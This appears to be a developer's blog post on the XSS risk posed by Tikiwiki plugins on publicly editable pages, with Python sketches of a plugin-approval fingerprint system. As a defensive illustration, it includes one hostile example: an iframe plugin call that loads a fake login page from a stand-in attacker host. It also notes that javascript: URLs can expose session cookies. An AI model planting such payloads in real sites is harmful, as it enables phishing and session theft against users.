Security in the wild

Wikis are open by nature, and that openness is what brought them success. Anyone can visit a page, edit it and see the changes live. The concept is really simple and quickly became natural; it's all around. However, wiki applications evolved over time. The average wiki is no longer just text editable by anyone. Wikis became the heart of complete content management systems with access rights and many other features. Wiki purists cringe when they hear of a wiki that is not editable by anyone; the corporate world does the same when they hear that their intranet could be modified by any employee.

In a standard wiki, the worst thing that can happen is that someone gets offended by false information (or plain offensive spam). Undo the last change; the world goes on.

As wikis evolved, usage called for higher-level functionality. Pages are no longer only textual information; they tend to become full-blown applications. They can generate dynamic lists and interact with external systems. This is mostly done through a syntax extension, often called a plugin. The concept is very simple: a unified syntax contains a name and some arguments. When the parser runs into it, it calls a custom function and displays the result. In most cases, these perform harmless operations and cannot cause any damage. All they do is display text, only slightly more complex text.
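To make the mechanism concrete, here is a minimal sketch of how such a parser hook might work. Everything here is hypothetical: the registry, the function names and the toy {NAME(...)}body{NAME} syntax (loosely inspired by Tikiwiki's, which is implemented in PHP, not Python). The point is only the dispatch: the parser finds a name and arguments, calls a registered function, and splices the result into the rendered page.

```python
import re

# Hypothetical registry mapping plugin names to renderer callables.
plugin_registry = {}

def register_plugin(name, func):
    plugin_registry[name.upper()] = func

# Toy syntax: {NAME(key=value,key=value)}body{NAME}
PLUGIN_RE = re.compile(
    r"\{(?P<name>[A-Z]+)\((?P<args>[^)]*)\)\}(?P<body>.*?)\{(?P=name)\}",
    re.DOTALL,
)

def parse_args(raw):
    args = {}
    for pair in filter(None, (p.strip() for p in raw.split(","))):
        key, _, value = pair.partition("=")
        args[key.strip()] = value.strip()
    return args

def render(wiki_text):
    def dispatch(match):
        func = plugin_registry.get(match.group("name"))
        if func is None:
            return match.group(0)  # unknown plugin: leave the markup as-is
        return func(parse_args(match.group("args")), match.group("body"))
    return PLUGIN_RE.sub(dispatch, wiki_text)
```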

The problem is that they can be used for a whole lot of things, and harmless really is context dependent. Consider a situation where content must be displayed from another web application, probably a legacy intranet application. One way to do it is to have the server fetch the HTML page, filter out some of the tags so it fits nicely in the page, and display it. This technique is very fragile when the content format changes and is quite hard for normal people to configure. An easier way would be to use an iframe and just load the page from wherever it is.
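An iframe plugin along those lines could be as small as the sketch below (hypothetical names again, continuing the toy registry above; this is not the actual Tikiwiki code). Notice that it simply emits whatever URL the page editor supplied, which is exactly why the safety of this plugin depends entirely on who can edit the page.

```python
import html

def iframe_plugin(args, body):
    # Renders an iframe pointing at whatever URL the page editor supplied.
    # Escaping keeps the attribute well-formed, but it cannot make an
    # attacker-chosen URL safe to embed in the first place.
    src = html.escape(args.get("src", ""))
    height = html.escape(args.get("height", "400"))
    return '<iframe src="%s" height="%s" width="100%%"></iframe>' % (src, height)

register_plugin("IFRAME", iframe_plugin)
```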

In a corporate setting, this probably works great because you can trust the people you work with not to screw up and load something they shouldn’t on the intranet’s home page.

If you use it on a public website where all edit rights are restricted, everything is fine. However, if you have a single page that allows public edits, you have just opened a very wide security gap that could allow even sub-script-kiddies (the kind of people who "hack" pages on Wikipedia) to hijack sessions through XSS.
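As an illustration of what that gap looks like, using the toy syntax from above (the URL and plugin call are made up), a visitor editing that one public page could drop in something like:

```
{IFRAME(src=http://attacker.example/fake-login)}{IFRAME}
```

An embedded page like this can impersonate the site's login form, and in older browsers a javascript: URL in an iframe src could execute script in the embedding page's own origin, exposing session cookies outright.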

The main issue is that these extensions are either installed or they are not. You could use one at some point in a completely safe environment, stop using it, and then the context that made it safe could change. The extension is still active and you forgot about it. It's installed site-wide; there is no way to enable it only on specific, controlled pages. Because the plugin instantiation is part of the page's content, you can't prevent anyone with edit rights on a page from using it.

In implementing remote plugins, this was a major issue. Not only was it a plugin that could potentially do harm, it was about plugins I don't even know about. I had this vague idea of requiring input validation on the remote plugins before letting them run, so that nothing could be called unless an administrator granted permission. All of it was fairly complicated because of implementation issues. During a discussion on IRC with sylvieg and ricks99, I realized that the problem existed beyond the remote service problem. So far, I had really considered that if the context wasn't safe, some extensions should not be installed. Rick was asking if there was a way to let admins add a plugin, but not anyone else. This got me to realize that the only reason it was hard to implement was that I was taking the problem from the wrong level. Applying the validation at the plugin-wide level made it much easier to deal with than doing it specifically for the remote ones. It also added a whole lot more value.

The final implementation is very simple in the end. When an extension can be dangerous, it declares it as part of its definition by identifying which parts require validation (body, arguments or both). When the wiki parser encounters a plugin that requires validation, it generates a fingerprint of the plugin and verifies whether that fingerprint is known. If it is, it goes on; otherwise, it displays controls on the page for authorized users to perform the audit (non-authorized ones get an error message). The fingerprint is nothing more than the name of the plugin, a hash of the serialized arguments, a hash of the body, and the size of both inputs to avoid collisions. Some arguments marked as safe can be excluded from the hash to allow some flexibility.
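A minimal sketch of that fingerprint-and-whitelist check, continuing the toy registry from earlier. The hash function, the serialization and the field separators here are my assumptions for illustration, not the actual Tikiwiki code (which is PHP); only the overall shape (name + sizes + argument hash + body hash, checked against a stored whitelist) follows the description above.

```python
import hashlib

def plugin_fingerprint(name, args, body, safe_args=()):
    # Arguments declared safe are left out of the hash so they can
    # change without invalidating a previous approval.
    relevant = sorted((k, v) for k, v in args.items() if k not in safe_args)
    serialized = repr(relevant)
    return "%s-%d-%d-%s-%s" % (
        name,
        len(serialized),
        len(body),
        hashlib.md5(serialized.encode()).hexdigest(),
        hashlib.md5(body.encode()).hexdigest(),
    )

approved_fingerprints = set()  # persisted in the database in practice

def run_if_approved(name, args, body, user_can_approve):
    fingerprint = plugin_fingerprint(name, args, body)
    if fingerprint in approved_fingerprints:
        return plugin_registry[name](args, body)
    if user_can_approve:
        # Hypothetical stand-in for the real audit controls.
        return ('<form method="post"><button name="approve" value="%s">'
                'Approve this %s plugin</button></form>' % (fingerprint, name))
    return "<em>This plugin call is awaiting validation.</em>"
```

Because the fingerprint covers the exact arguments and body, any edit to the plugin call automatically falls out of the whitelist and must be re-approved.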

The end result is that any plugin can be enabled on any host in any context, and the site's users are still safe from XSS attacks. More capabilities for public/open wikis. Of course, in keeping with Tikiwiki policies, validation can be disabled, which is useful if you have one of those safe contexts.

It does have a downside, though. Validation is required whenever changes are made to the plugin, which means the page is not fully enabled until an auditor visits it, and that may take some time. Notifications, tracking... there are solutions, but seeing the changes live the moment you click save is no longer possible. The whitelist verification is a pessimistic approach to the problem, but it's still better than letting a few identities be stolen before it's caught.

The implementation is available in Tikiwiki SVN and will be released as part of 3.0 in April 2009.
